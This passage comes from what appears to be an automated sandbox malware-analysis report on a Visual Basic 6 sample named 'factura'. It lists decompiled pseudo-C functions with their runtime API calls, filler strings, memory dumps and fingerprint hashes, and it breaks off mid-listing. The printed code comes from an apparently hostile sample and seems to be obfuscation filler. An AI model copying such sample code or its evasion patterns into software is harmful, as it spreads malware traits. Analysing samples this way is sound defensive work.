Function 00408F5B, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00408F5B(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				long long* _v12;
				char _v36;
				char* _v44;
				intOrPtr _v52;
				char* _t16;
				char* _t18;
				long long* _t28;
				void* _t29;
				long long _t31;

				_t29 = __eflags;
				_t18 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t28;
				_t16 = 0x24;
				L00401420();
				_v12 = _t28;
				_v8 = 0x401298;
				_push(__ecx);
				_push(__ecx);
				 *_t28 =  *0x401290;
				_t31 =  *0x401290;
				_push(__ecx);
				_push(__ecx);
				 *_t28 = _t31;
				asm("fldz");
				_push(__ecx);
				_push(__ecx);
				 *_t28 = _t31;
				L004015CA();
				L004015F4();
				asm("fcomp qword [0x401288]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v44 = L"penplotter";
					_v52 = 8;
					L004015BE();
					_t16 =  &_v36;
					_push(_t16);
					L004015C4();
					_t18 =  &_v36;
					L0040164E();
				}
				asm("fldz");
				_push(_t18);
				_push(_t18);
				 *_t28 = _t31;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t29 != 0) {
					_v44 = L"Betjeningens";
					_v52 = 8;
					L004015BE();
					_t16 =  &_v36;
					_push(_t16);
					L004015C4();
					L0040164E();
				}
				asm("wait");
				_push(E0040903C);
				return _t16;
			}

0x00408f5b
0x00408f5b
0x00408f5e
0x00408f5f
0x00408f60
0x00408f6b
0x00408f6c
0x00408f75
0x00408f76
0x00408f7e
0x00408f81
0x00408f8e
0x00408f8f
0x00408f90
0x00408f93
0x00408f99
0x00408f9a
0x00408f9b
0x00408f9e
0x00408fa0
0x00408fa1
0x00408fa2
0x00408fa5
0x00408faa
0x00408faf
0x00408fb5
0x00408fb7
0x00408fb8
0x00408fba
0x00408fc1
0x00408fce
0x00408fd3
0x00408fd6
0x00408fd7
0x00408fdc
0x00408fdf
0x00408fdf
0x00408fe4
0x00408fe6
0x00408fe7
0x00408fe8
0x00408feb
0x00408ff0
0x00408ff5
0x00408ffb
0x00408ffd
0x00408ffe
0x00409000
0x00409007
0x00409014
0x00409019
0x0040901c
0x0040901d
0x00409025
0x00409025
0x0040902a
0x0040902b
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00408F76
#671.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FA5
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FAA
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FCE
#529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FD7
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FDF
#583.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FEB
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00408FF0
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409014
#529.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0040901D
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 00409025

Strings

Betjeningens, xrefs: 00409000
penplotter, xrefs: 00408FBA

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$#529Free$#583#671Chkstk
String ID: Betjeningens$penplotter
API String ID: 3337120450-2381333887
Opcode ID: 30a8da4502bbc622766b74ec4dc90bde2ed25b45617b361664e37fb62d55f059
Instruction ID: bb208a3c7f835f8ad071c62f5d722c26f2dfd6097b3eb7f3912c2590df176cba
Opcode Fuzzy Hash: 30a8da4502bbc622766b74ec4dc90bde2ed25b45617b361664e37fb62d55f059
Instruction Fuzzy Hash: 6F1108B0820519BACB04AF91DD9AEEEBBB8FB44744F44467EF081760E1DBBC1904876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040971F, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E0040971F(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				long long _v32;
				intOrPtr _v40;
				char _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr _t25;
				char* _t26;
				char* _t32;
				intOrPtr _t48;
				long long _t52;

				_t52 = __fp0;
				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t25 = 0x44;
				L00401420();
				_v12 = _t48;
				_v8 = 0x4012d8;
				L0040163C();
				L00401576();
				_v40 = _t25;
				_v48 = 8;
				_t26 =  &_v48;
				_push(_t26);
				L0040157C();
				_v84 =  ~(0 | _t26 != 0x0000ffff);
				L0040164E();
				if(_v84 != 0) {
					_push(L"Laanendes7");
					_push(0xcb);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v72 = L"9/9/9";
				_v80 = 8;
				L004015BE();
				_push( &_v48);
				_push( &_v64);
				L0040156A();
				_push( &_v64);
				L00401570();
				_v32 = _t52;
				_push( &_v64);
				_t32 =  &_v48;
				_push(_t32);
				_push(2);
				L00401600();
				asm("wait");
				_push(E00409809);
				L0040166C();
				return _t32;
			}

0x0040971f
0x00409724
0x0040972f
0x00409730
0x00409739
0x0040973a
0x00409742
0x00409745
0x00409752
0x00409757
0x0040975c
0x0040975f
0x00409766
0x00409769
0x0040976a
0x0040977a
0x00409781
0x0040978c
0x0040978e
0x00409793
0x00409798
0x0040979a
0x0040979c
0x0040979c
0x004097a1
0x004097a8
0x004097b5
0x004097bd
0x004097c1
0x004097c2
0x004097ca
0x004097cb
0x004097d0
0x004097d6
0x004097d7
0x004097da
0x004097db
0x004097dd
0x004097e5
0x004097e6
0x00409803
0x00409808

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040973A
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409752
#609.MSVBVM60(?,?,?,?,00401426), ref: 00409757
#557.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 0040976A
__vbaFreeVar.MSVBVM60(00000008,?,?,?,?,?,?,?,?,00401426), ref: 00409781
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000CB,Laanendes7,00000008,?,?,?,?,?,?,?,?,00401426), ref: 0040979C
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000008), ref: 004097B5
#687.MSVBVM60(?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097C2
__vbaDateVar.MSVBVM60(?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097CB
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,?,?,?,?,?,?,?,00000008), ref: 004097DD
__vbaFreeStr.MSVBVM60(00409809), ref: 00409803

Strings

9/9/9, xrefs: 004097A1
Laanendes7, xrefs: 0040978E

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#557#609#687ChkstkCopyDateFileListOpen
String ID: 9/9/9$Laanendes7
API String ID: 1694687497-38042795
Opcode ID: 196b3277e86ddc09dba683a7e7cbdcd22beeaf53b5c1bbc61fefefe5b972ae20
Instruction ID: f86d2d77c8b16b18d5153e71681289021deaf2db517771df69892675ab180e2f
Opcode Fuzzy Hash: 196b3277e86ddc09dba683a7e7cbdcd22beeaf53b5c1bbc61fefefe5b972ae20
Instruction Fuzzy Hash: 9E2149B1D00209ABDB10EBE5CC46FEEB7B8AF04704F50853BF111B61E1EB7899058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409FA2, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00409FA2(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char* _v100;
				intOrPtr _v108;
				char* _t36;
				void* _t53;
				void* _t55;
				long long* _t56;

				_t56 = _t55 - 0xc;
				 *[fs:0x0] = _t56;
				L00401420();
				_v16 = _t56;
				_v12 = 0x401378;
				_v8 = 0;
				_t36 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t53);
				asm("fldz");
				 *_t56 = __fp0;
				L004015B8();
				L004015F4();
				asm("fcomp qword [0x401280]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v100 = L"Ankestyrelses";
					_v108 = 8;
					L004015BE();
					_t36 =  &_v44;
					_push(_t36);
					L004015C4();
					L0040164E();
				}
				_push(0x402ab0);
				L004014C2();
				if(_t36 != 0x61) {
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v100 = L"Stavlygterne8";
					_v108 = 8;
					L004015BE();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(0);
					_push( &_v44);
					L004014FE();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_t36 =  &_v44;
					_push(_t36);
					_push(4);
					L00401600();
				}
				_v28 =  *0x401370;
				asm("wait");
				_push(E0040A0DB);
				return _t36;
			}

0x00409fa5
0x00409fb4
0x00409fc0
0x00409fc8
0x00409fcb
0x00409fd2
0x00409fe1
0x00409fe4
0x00409fe8
0x00409feb
0x00409ff0
0x00409ff5
0x00409ffb
0x00409ffd
0x00409ffe
0x0040a000
0x0040a007
0x0040a014
0x0040a019
0x0040a01c
0x0040a01d
0x0040a025
0x0040a025
0x0040a02a
0x0040a02f
0x0040a038
0x0040a03a
0x0040a041
0x0040a048
0x0040a04f
0x0040a056
0x0040a05d
0x0040a064
0x0040a06b
0x0040a078
0x0040a080
0x0040a084
0x0040a088
0x0040a089
0x0040a08e
0x0040a08f
0x0040a097
0x0040a09b
0x0040a09f
0x0040a0a0
0x0040a0a3
0x0040a0a4
0x0040a0a6
0x0040a0ab
0x0040a0b4
0x0040a0b7
0x0040a0b8
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409FC0
#583.MSVBVM60(?,?,?,?,?,?,00401426), ref: 00409FEB
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401426), ref: 00409FF0
__vbaVarDup.MSVBVM60 ref: 0040A014
#529.MSVBVM60(?), ref: 0040A01D
__vbaFreeVar.MSVBVM60(?), ref: 0040A025
#516.MSVBVM60(00402AB0,?,?,?,?,?,?,00401426), ref: 0040A02F
__vbaVarDup.MSVBVM60(00402AB0,?), ref: 0040A078
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 0040A08F
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 0040A0A6

Strings

Ankestyrelses, xrefs: 0040A000
Stavlygterne8, xrefs: 0040A064

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#516#529#583#595ChkstkList
String ID: Ankestyrelses$Stavlygterne8
API String ID: 1605959742-1351759999
Opcode ID: 3dde9d678e727c1e00c28a87ccfaff2a17dba89fd56124057d2c7dc67d9d73f6
Instruction ID: 864b04378e77336a63fe531cdabb2946a2ab07fb53832f436aaf2ea8741e58b9
Opcode Fuzzy Hash: 3dde9d678e727c1e00c28a87ccfaff2a17dba89fd56124057d2c7dc67d9d73f6
Instruction Fuzzy Hash: 7C31C2B190020CEBDB00EFD0D989BDEBBB8EB04744F44452AE501BB1A1DBB95589CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A513, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0040A513(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				void* _t68;
				void* _t70;
				intOrPtr _t71;

				_t71 = _t70 - 0xc;
				 *[fs:0x0] = _t71;
				L00401420();
				_v16 = _t71;
				_v12 = 0x4013b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401426, _t68);
				if( *0x40c33c != 0) {
					_v88 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v88 = 0x40c33c;
				}
				_v60 =  *_v88;
				_t54 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t54;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026d4);
					_push(_v60);
					_push(_v64);
					L00401654();
					_v92 = _t54;
				}
				_v68 = _v40;
				_t59 =  *((intOrPtr*)( *_v68 + 0x110))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t59;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x110);
					_push(0x402934);
					_push(_v68);
					_push(_v72);
					L00401654();
					_v96 = _t59;
				}
				_t60 = _v36;
				_v84 = _t60;
				_v36 = _v36 & 0x00000000;
				L00401678();
				L004015E8();
				_push(2);
				_push("ABC");
				_push(0x402954);
				_push(0);
				L00401564();
				if(_t60 != 3) {
					_push(L"GUMME");
					_push(0x2e);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v28 = 0x228e;
				_push(E0040A665);
				L0040166C();
				return _t60;
			}

0x0040a516
0x0040a525
0x0040a52f
0x0040a537
0x0040a53a
0x0040a541
0x0040a550
0x0040a55a
0x0040a574
0x0040a55c
0x0040a55c
0x0040a561
0x0040a566
0x0040a56b
0x0040a56b
0x0040a580
0x0040a58f
0x0040a592
0x0040a594
0x0040a59b
0x0040a5b4
0x0040a59d
0x0040a59d
0x0040a59f
0x0040a5a4
0x0040a5a7
0x0040a5aa
0x0040a5af
0x0040a5af
0x0040a5bb
0x0040a5ca
0x0040a5d0
0x0040a5d2
0x0040a5d9
0x0040a5f5
0x0040a5db
0x0040a5db
0x0040a5e0
0x0040a5e5
0x0040a5e8
0x0040a5eb
0x0040a5f0
0x0040a5f0
0x0040a5f9
0x0040a5fc
0x0040a5ff
0x0040a609
0x0040a611
0x0040a616
0x0040a618
0x0040a61d
0x0040a622
0x0040a624
0x0040a62c
0x0040a62e
0x0040a633
0x0040a635
0x0040a637
0x0040a639
0x0040a639
0x0040a63e
0x0040a644
0x0040a65f
0x0040a664

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A52F
__vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A566
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A5AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000110), ref: 0040A5EB
__vbaStrMove.MSVBVM60 ref: 0040A609
__vbaFreeObj.MSVBVM60 ref: 0040A611
__vbaInStr.MSVBVM60(00000000,00402954,ABC,00000002), ref: 0040A624
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000002E,GUMME,00000000,00402954,ABC,00000002), ref: 0040A639
__vbaFreeStr.MSVBVM60(0040A665,00000000,00402954,ABC,00000002), ref: 0040A65F

Strings

GUMME, xrefs: 0040A62E
ABC, xrefs: 0040A618

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkFileMoveNew2Open
String ID: ABC$GUMME
API String ID: 3746238256-2158301107
Opcode ID: 61b60d5fa60bb4e7e7e56d23c09ac7f4d330d7e7d646b81aa55fad1ed7943005
Instruction ID: ae1049380588b2ebddeee5d168d9e9f09cd0bbd490c475ec01e6100fe610767c
Opcode Fuzzy Hash: 61b60d5fa60bb4e7e7e56d23c09ac7f4d330d7e7d646b81aa55fad1ed7943005
Instruction Fuzzy Hash: 9D41E270D40308EFDB00EF95DD8AF9DBBB4BB18708F20852AF101BA2E1D7B959558B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A416, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040A416(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				intOrPtr _v40;
				char _v48;
				short _v68;
				void* _t20;
				signed int _t21;
				short _t25;
				void* _t33;
				void* _t35;
				intOrPtr _t36;

				_t36 = _t35 - 0xc;
				 *[fs:0x0] = _t36;
				L00401420();
				_v16 = _t36;
				_v12 = 0x4013a8;
				_v8 = 0;
				_t20 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t33);
				_push(0x4029a8);
				L0040153A();
				if(_t20 != 2) {
					_push(L"Lombard");
					L004014EC();
				}
				_v40 = 2;
				_v48 = 2;
				_t21 =  &_v48;
				_push(_t21);
				_push(1);
				_push(L"FGFG");
				L004014E6();
				L00401678();
				_push(_t21);
				_push(0x402b94);
				L0040167E();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t21));
				L0040166C();
				L0040164E();
				_t25 = _v68;
				if(_t25 != 0) {
					L004014E0();
				}
				_v28 = 0x34d1;
				_push(E0040A4EA);
				return _t25;
			}

0x0040a419
0x0040a428
0x0040a432
0x0040a43a
0x0040a43d
0x0040a444
0x0040a453
0x0040a456
0x0040a45b
0x0040a463
0x0040a465
0x0040a46a
0x0040a46a
0x0040a46f
0x0040a476
0x0040a47d
0x0040a480
0x0040a481
0x0040a483
0x0040a488
0x0040a492
0x0040a497
0x0040a498
0x0040a49d
0x0040a4a4
0x0040a4aa
0x0040a4b1
0x0040a4b9
0x0040a4be
0x0040a4c4
0x0040a4c6
0x0040a4c6
0x0040a4cb
0x0040a4d1
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A432
__vbaI4Str.MSVBVM60(004029A8,?,?,?,?,00401426), ref: 0040A45B
#531.MSVBVM60(Lombard,004029A8,?,?,?,?,00401426), ref: 0040A46A
#628.MSVBVM60(FGFG,00000001,00000002), ref: 0040A488
__vbaStrMove.MSVBVM60(FGFG,00000001,00000002), ref: 0040A492
__vbaStrCmp.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A49D
__vbaFreeStr.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4B1
__vbaFreeVar.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4B9
__vbaEnd.MSVBVM60(00402B94,00000000,FGFG,00000001,00000002), ref: 0040A4C6

Strings

FGFG, xrefs: 0040A483
Lombard, xrefs: 0040A465

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#531#628ChkstkMove
String ID: FGFG$Lombard
API String ID: 845745086-2614402114
Opcode ID: cdbe58079c5b2d704fddd0c550a9b743908724a33b2dc9fa8964a25cf877668c
Instruction ID: 4a309e415e34b54ebaae6198b648cdf69c86de27e98954320782a1202e15f6f4
Opcode Fuzzy Hash: cdbe58079c5b2d704fddd0c550a9b743908724a33b2dc9fa8964a25cf877668c
Instruction Fuzzy Hash: 80114274A40209ABCB10EFA5C94ABAE77B4AF04744F50843BF401B71E1DBBD5905C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D92, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00408D92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				signed char _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed char _v68;
				signed char* _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _t68;
				signed int _t73;
				signed char _t74;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				signed long long _t92;

				_t88 = _t87 - 0xc;
				 *[fs:0x0] = _t88;
				L00401420();
				_v16 = _t88;
				_v12 = 0x401270;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401426, _t85);
				if( *0x40c33c != 0) {
					_v72 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v72 = 0x40c33c;
				}
				_v44 =  *_v72;
				_t68 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v40);
				asm("fclex");
				_v48 = _t68;
				if(_v48 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026d4);
					_push(_v44);
					_push(_v48);
					L00401654();
					_v76 = _t68;
				}
				_v52 = _v40;
				_t73 =  *((intOrPtr*)( *_v52 + 0x130))(_v52,  &_v36);
				asm("fclex");
				_v56 = _t73;
				if(_v56 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x402934);
					_push(_v52);
					_push(_v56);
					L00401654();
					_v80 = _t73;
				}
				_t74 = _v36;
				_v68 = _t74;
				_v36 = _v36 & 0x00000000;
				L00401678();
				L004015E8();
				_push(2);
				_push("ABC");
				_push(0x402954);
				_push(0);
				L004015D0();
				if(_t74 != 5) {
					_t92 =  *0x401268 *  *0x401260;
					asm("fnstsw ax");
					if((_t74 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v84 = _t92;
					_v76 = _v84;
					_t74 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v40);
					asm("fclex");
					_v44 = _t74;
					if(_v44 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x402484);
						_push(_a4);
						_push(_v44);
						L00401654();
						_v88 = _t74;
					}
				}
				_v32 =  *0x401258;
				asm("wait");
				_push(E00408F2F);
				L0040166C();
				return _t74;
			}

0x00408d95
0x00408da4
0x00408dae
0x00408db6
0x00408db9
0x00408dc0
0x00408dcf
0x00408dd9
0x00408df3
0x00408ddb
0x00408ddb
0x00408de0
0x00408de5
0x00408dea
0x00408dea
0x00408dff
0x00408e0e
0x00408e11
0x00408e13
0x00408e1a
0x00408e33
0x00408e1c
0x00408e1c
0x00408e1e
0x00408e23
0x00408e26
0x00408e29
0x00408e2e
0x00408e2e
0x00408e3a
0x00408e49
0x00408e4f
0x00408e51
0x00408e58
0x00408e74
0x00408e5a
0x00408e5a
0x00408e5f
0x00408e64
0x00408e67
0x00408e6a
0x00408e6f
0x00408e6f
0x00408e78
0x00408e7b
0x00408e7e
0x00408e88
0x00408e90
0x00408e95
0x00408e97
0x00408e9c
0x00408ea1
0x00408ea3
0x00408eab
0x00408eb3
0x00408eb9
0x00408ebd
0x0040142c
0x0040142c
0x00408ec3
0x00408eca
0x00408ed5
0x00408edb
0x00408edd
0x00408ee4
0x00408f00
0x00408ee6
0x00408ee6
0x00408eeb
0x00408ef0
0x00408ef3
0x00408ef6
0x00408efb
0x00408efb
0x00408ee4
0x00408f0a
0x00408f0d
0x00408f0e
0x00408f29
0x00408f2e

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00408DAE
__vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 00408DE5
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 00408E29
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E6A
__vbaStrMove.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E88
__vbaFreeObj.MSVBVM60(00000000,?,00402934,00000130), ref: 00408E90
__vbaInStrB.MSVBVM60(00000000,00402954,ABC,00000002), ref: 00408EA3
__vbaHresultCheckObj.MSVBVM60(00000000,00401270,00402484,00000084,?,00000000,00402954,ABC,00000002), ref: 00408EF6
__vbaFreeStr.MSVBVM60(00408F2F,00000000,00402954,ABC,00000002), ref: 00408F29

Strings

ABC, xrefs: 00408E97

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckHresult$Free$ChkstkMoveNew2
String ID: ABC
API String ID: 670677746-2743272264
Opcode ID: 45f00b66c91a0381b391a4af9609b5790bdbe07bd525c805d60f012ebc005755
Instruction ID: 061f8633a8cec4f2a96e294f7c8d0de8b81816a1abed86a6593cdfd7162fa9f4
Opcode Fuzzy Hash: 45f00b66c91a0381b391a4af9609b5790bdbe07bd525c805d60f012ebc005755
Instruction Fuzzy Hash: 2041E170900209EFCB00EFA5DA89BDDBBB1FF18708F10856AE145B62E0CB795945DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00408CAB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00408CAB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v36;
				char _v44;
				short _v64;
				char* _t27;
				short _t28;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L00401420();
				_v16 = _t43;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401426, _t40);
				_v36 = 2;
				_v44 = 2;
				_push( &_v44);
				L004015E2();
				L00401678();
				L0040164E();
				_v36 = 0x845a5d;
				_v44 = 3;
				_t27 =  &_v44;
				_push(_t27);
				L004015DC();
				_v64 =  ~(0 | _t27 != 0x0000ffff);
				L0040164E();
				_t28 = _v64;
				if(_t28 != 0) {
					_push(L"Mislike");
					_push(0x5b);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_push(E00408D73);
				L0040166C();
				return _t28;
			}

0x00408cae
0x00408cbd
0x00408cc7
0x00408ccf
0x00408cd2
0x00408cd9
0x00408ce8
0x00408ceb
0x00408cf2
0x00408cfc
0x00408cfd
0x00408d07
0x00408d0f
0x00408d14
0x00408d1b
0x00408d22
0x00408d25
0x00408d26
0x00408d36
0x00408d3d
0x00408d42
0x00408d48
0x00408d4a
0x00408d4f
0x00408d51
0x00408d53
0x00408d55
0x00408d55
0x00408d5a
0x00408d6d
0x00408d72

APIs

